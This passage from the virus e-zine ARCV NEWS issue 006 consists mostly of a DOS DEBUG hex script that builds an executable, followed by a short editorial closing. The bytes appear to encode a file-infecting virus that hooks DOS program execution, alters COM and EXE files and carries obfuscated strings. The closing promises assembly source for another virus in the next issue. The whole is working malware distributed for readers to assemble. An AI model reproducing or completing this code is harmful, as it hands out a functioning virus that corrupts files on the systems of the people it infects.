e 0180 54 61 28 99 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 01
e 0190 00 00 00 00 00 FC 06 B8 00 00 8E C0 26 A1 84 00
e 01A0 07 3D 4C 02 75 10 B4 DD BF 00 01 BE C2 06 03 F7
e 01B0 2E 8B 4D 11 CD 21 8C C8 05 10 00 8E D0 BC C0 06
e 01C0 50 B8 C6 00 50 CB FC 06 2E 8C 06 31 00 2E 8C 06
e 01D0 39 00 2E 8C 06 3D 00 2E 8C 06 41 00 8C C0 05 10
e 01E0 00 2E 01 06 49 00 2E 01 06 45 00 B4 FF CD 21 80
e 01F0 FC 04 75 10 07 2E 8E 16 45 00 2E 8B 26 43 00 2E
e 0200 FF 2E 47 00 33 C0 8E C0 BB FC 03 26 8B 07 2E A3
e 0210 4B 00 26 8A 47 02 2E A2 4D 00 26 C7 07 F3 A5 26
e 0220 C6 47 02 CB 58 05 10 00 8E C0 0E 1F B9 C2 06 D1
e 0230 E9 33 F6 8B FE 06 B8 3E 01 50 FF 2E 59 06 8C C8
e 0240 8E D0 BC C0 06 33 C0 8E D8 2E A1 4B 00 89 07 2E
e 0250 A0 4D 00 88 47 02 8B DC B1 04 D3 EB 83 C3 20 83
e 0260 E3 F0 2E 89 1E 33 00 B4 4A 2E 8E 06 31 00 CD 21
e 0270 B8 21 35 CD 21 2E 89 1E 17 00 2E 8C 06 19 00 0E
e 0280 1F BA 4C 02 B8 21 25 CD 21 8E 06 31 00 26 8E 06
e 0290 2C 00 33 FF B9 FF 7F 32 C0 F2 AE 26 38 05 E0 F9
e 02A0 8B D7 83 C2 03 B8 00 4B 06 1F 0E 07 BB 35 00 1E
e 02B0 06 50 53 51 52 B4 0F CD 10 3C 07 74 07 2E C7 06
e 02C0 4A 02 00 B8 B8 08 35 CD 21 2E 89 1E 13 00 2E 8C
e 02D0 06 15 00 0E 1F C7 06 1F 00 E0 79 B8 08 25 BA 0A
e 02E0 02 CD 21 5A 59 5B 58 07 1F 9C 2E FF 1E 17 00 1E
e 02F0 07 B4 49 CD 21 B4 4D CD 21 B4 31 BA C2 06 B1 04
e 0300 D3 EA 83 C2 10 CD 21 32 C0 CF 2E 83 3E 1F 00 00
e 0310 75 22 1E 06 56 57 50 8D 36 3E 02 0E 1F A1 4A 02
e 0320 8E C0 BF 00 00 FC A5 A5 A5 A5 A5 A5 58 5F 5E 07
e 0330 1F EB 06 90 2E FF 0E 1F 00 2E FF 2E 13 00 48 F0
e 0340 61 F0 21 F0 48 F0 61 F0 21 F0 00 B8 9C 80 FC FF
e 0350 75 05 B8 00 04 9D CF 80 FC DD 74 0E 3D 00 4B 75
e 0360 03 EB 21 90 9D 2E FF 2E 17 00 58 58 B8 00 01 2E
e 0370 A3 0A 00 58 2E A3 0C 00 F3 A4 9D 2E A1 0F 00 2E
e 0380 FF 2E 0A 00 2E C7 06 70 00 FF FF 2E C7 06 8F 00
e 0390 00 00 2E 89 16 80 00 2E 8C 1E 82 00 50 53 51 52
e 03A0 56 57 1E 06 FC 8B FA 32 D2 80 7D 01 3A 75 05 8A
e 03B0 15 80 E2 1F B4 36 CD 21 3D FF FF 75 03 E9 0F 03
e 03C0 F7 E3 F7 E1 0B D2 75 05 3D C2 06 72 F0 2E 8B 16
e 03D0 80 00 1E 07 32 C0 B9 41 00 F2 AE 2E 8B 36 80 00
e 03E0 8A 04 0A C0 74 0E 3C 61 72 07 3C 7A 77 03 80 2C
e 03F0 20 46 EB EC 2E 89 36 57 06 B9 0B 00 2B F1 BF 84
e 0400 00 0E 07 B9 0B 00 F3 A6 75 03 E9 C2 02 2E C6 06
e 0410 56 06 00 90 2E 8B 36 57 06 8D 3E 55 06 4F 4E 26
e 0420 8A 05 34 BB 3C 00 74 0D 3A 04 74 F1 2E C6 06 56
e 0430 06 01 90 EB E8 2E 80 3E 56 06 00 74 16 4F 26 80
e 0440 3D FF 74 2B 47 2E 8B 36 57 06 2E C6 06 56 06 00
e 0450 90 EB CA 07 1F 5F 5E 5A 59 5B 58 33 C9 B8 01 43
e 0460 CD 21 B4 41 CD 21 B8 00 4B 9D 2E FF 2E 17 00 B8
e 0470 00 43 CD 21 72 05 2E 89 0E 72 00 72 25 32 C0 2E
e 0480 A2 4E 00 1E 07 8B FA B9 41 00 F2 AE 80 7D FE 4D
e 0490 74 0B 80 7D FE 6D 74 05 2E FE 06 4E 00 B8 00 3D
e 04A0 CD 21 72 7C 2E A3 70 00 8B D8 B8 02 42 B9 FF FF
e 04B0 BA FB FF CD 21 72 EB 05 05 00 2E A3 11 00 B9 05
e 04C0 00 BA 6B 00 8C C8 8E D8 8E C0 B4 3F CD 21 8B FA
e 04D0 BE 05 00 F3 A6 74 22 B0 00 B9 00 00 BA 00 00 B4
e 04E0 42 CD 21 8D 16 DD 05 B9 14 00 B4 3F CD 21 81 3E
e 04F0 EF 05 89 19 75 0A E9 91 01 B4 3E CD 21 E9 CF 01
e 0500 B8 24 35 CD 21 89 1E 1B 00 8C 06 1D 00 BA 07 02
e 0510 B8 24 25 CD 21 C5 16 80 00 33 C9 B8 01 43 CD 21
e 0520 72 3B 2E 8B 1E 70 00 B4 3E CD 21 2E C7 06 70 00
e 0530 FF FF B8 02 3D CD 21 72 24 2E A3 70 00 8C C8 8E
e 0540 D8 8E C0 8B 1E 70 00 B8 00 57 CD 21 89 16 74 00
e 0550 89 0E 76 00 B8 00 42 33 C9 8B D1 CD 21 72 3E 80
e 0560 3E 4E 00 00 74 04 EB 5B 90 90 BB 00 10 B4 48 CD
e 0570 21 73 0B B4 3E 8B 1E 70 00 CD 21 E9 51 01 FF 06
e 0580 8F 00 8E C0 33 F6 8B FE B9 C2 06 F3 A4 8B D7 8B
e 0590 0E 11 00 8B 1E 70 00 06 1F B4 3F CD 21 72 1F 03
e 05A0 F9 33 C9 8B D1 B8 00 42 CD 21 BE 05 00 B9 05 00
e 05B0 1E 0E 1F F3 A4 1F 8B CF 33 D2 B4 40 CD 21 72 0D
e 05C0 E9 C7 00 B9 1C 00 BA 4F 00 B4 3F CD 21 72 4A C7
e 05D0 06 61 00 89 19 A1 5D 00 A3 45 00 A1 5F 00 A3 43
e 05E0 00 A1 63 00 A3 47 00 A1 65 00 A3 49 00 A1 53 00
e 05F0 83 3E 51 00 00 74 01 48 F7 26 78 00 03 06 51 00
e 0600 83 D2 00 05 0F 00 83 D2 00 25 F0 FF A3 7C 00 89
e 0610 16 7E 00 05 C7 06 83 D2 00 72 3A F7 36 78 00 0B
e 0620 D2 74 01 40 A3 53 00 89 16 51 00 A1 7C 00 8B 16
e 0630 7E 00 F7 36 7A 00 2B 06 57 00 A3 65 00 C7 06 63
e 0640 00 C6 00 A3 5D 00 C7 06 5F 00 C0 06 33 C9 8B D1
e 0650 B8 00 42 CD 21 72 0A B9 1C 00 BA 4F 00 B4 40 CD
e 0660 21 72 11 3B C1 75 23 8B 16 7C 00 8B 0E 7E 00 B8
e 0670 00 42 CD 21 72 14 33 D2 B9 C2 06 B4 40 CD 21 B9
e 0680 05 00 8D 16 05 00 B4 40 CD 21 2E 83 3E 8F 00 00
e 0690 74 04 B4 49 CD 21 2E 83 3E 70 00 FF 74 31 2E 8B
e 06A0 1E 70 00 2E 8B 16 74 00 2E 8B 0E 76 00 B8 01 57
e 06B0 CD 21 B4 3E CD 21 0E 1F C5 16 80 00 2E 8B 0E 72
e 06C0 00 B8 01 43 CD 21 8D 16 1B 00 B8 24 25 CD 21 07
e 06D0 1F 5F 5E 5A 59 5B 58 9D 2E FF 2E 17 00 CD 20 BA
e 06E0 00 11 01 ED 05 80 01 23 0B FF FF 95 22 00 0A D5
e 06F0 44 00 00 00 00 00 00 00 00 00 00 FF BB F9 FA E8
e 0700 F2 F8 FA 95 FE E3 FE BB F8 EE E9 FE 95 FE E3 FE
e 0710 BB F7 F4 EF EE E8 95 F8 F4 F6 BB F8 EC F2 95 FE
e 0720 E3 FE BB FE EF F9 FA E8 F2 F8 95 FE E3 FE BB F9
e 0730 FA E8 F2 F8 FA 95 F8 F4 F6 BB 8A 89 88 95 FE E3
e 0740 FE BB FF F9 FA E8 FE 95 FE E3 FE BB F9 FA E8 F2
e 0750 F8 95 F8 F4 F6 BB 01 68 61 FC 03 00 00 00 00 00
e 0760 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0770 00 00 00 00 00 00 00 00 8C 0D 01 00 20 1C C3 28
e 0780 8C 0D 01 00 FE 26 2E 00 8C 0D 04 7F A7 20 6C 15
e 0790 24 25 05 00 20 00 C6 08 60 C1 57 18 08 25 AB 00
e 07A0 44 7F 0A 02 C2 06 57 18 BD 1D 47 01 04 7F 7C 00
e 07B0 C2 06 B6 00 1C 09 AF 1D 3D 1C 07 02 BD 1D 02 02
e 07C0 4D 3A CD 20 C8 F7 E1 EE E7 1A 1A 1A 1A 1A 1A 1A
rcx
7CF
w
q
---------------------------------------------------------------------------
ARCV NEWS 006.
Closing.
Well that it for this time the mag in future will be a Bi-Monthly
affair and I now offer out to you all to send in any articile for inclusion
in future issues.
Well I'm not sure what will be in next month but we should have the
Asm source for Commander Bomber Virus and much more.